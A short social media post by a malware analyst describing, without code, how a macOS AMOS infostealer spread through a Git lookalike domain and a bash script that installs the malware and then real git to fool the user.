
Bhargav Rathod
@malwr4n6
Published: March 20, 2025
5
9
37
Happened to analyze a suspicious macOS file. A developer downloaded Git from a git lookalike domain. Turns out to be #AMOS :) Thanks to @obje tool Lulu @patrickwardle Check out for more in the thread #macos #malwareanalysis #malware #infostealer
Turns out this bash script downloads a dmg file, mounts it, executes it and then installs legit git via homebrew! Nice trick to fool a user 😈